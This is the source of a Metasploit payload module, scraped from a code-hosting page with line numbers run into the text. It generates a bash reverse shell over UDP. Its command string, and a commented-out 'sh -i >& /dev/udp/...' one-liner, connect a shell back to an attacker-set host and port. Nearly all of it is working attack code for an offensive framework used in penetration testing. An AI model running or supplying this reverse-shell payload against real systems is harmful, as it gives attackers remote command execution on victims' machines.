Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb
Views: 11780
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##456module MetasploitModule78CachedSize = :dynamic910include Msf::Payload::Single11include Msf::Sessions::CommandShellOptions1213def initialize(info = {})14super(merge_info(info,15'Name' => 'Unix Command Shell, Reverse UDP (/dev/udp)',16'Description' => %q{17Creates an interactive shell via bash's builtin /dev/udp.1819This will not work on circa 2009 and older Debian-based Linux20distributions (including Ubuntu) because they compile bash21without the /dev/udp feature.22},23'Author' => [24'hdm', # Reverse bash TCP25'bcoles' # Reverse bash UDP26],27'License' => MSF_LICENSE,28'Platform' => 'unix',29'Arch' => ARCH_CMD,30'Handler' => Msf::Handler::ReverseUdp,31'Session' => Msf::Sessions::CommandShell,32'PayloadType' => 'cmd_bash',33'RequiredCmd' => 'bash-udp',34'Payload' =>35{36'Offsets' => { },37'Payload' => ''38}39))40register_advanced_options(41[42OptString.new('BashPath', [true, 'The path to the Bash executable', 'bash']),43OptString.new('ShellPath', [true, 'The path to the shell to execute', 'sh'])44]45)46end4748#49# Constructs the payload50#51def generate(_opts = {})52vprint_good(command_string)53return super + command_string54end5556#57# Returns the command string to use for execution58#59def command_string60fd = rand(200) + 2061return "#{datastore['BashPath']} -c '0<&#{fd}-;exec #{fd}<>/dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']};echo>&#{fd};#{datastore['ShellPath']} <&#{fd} >&#{fd} 2>&#{fd}'";6263# no semicolons64#return "sh -i >& /dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1"65end66end676869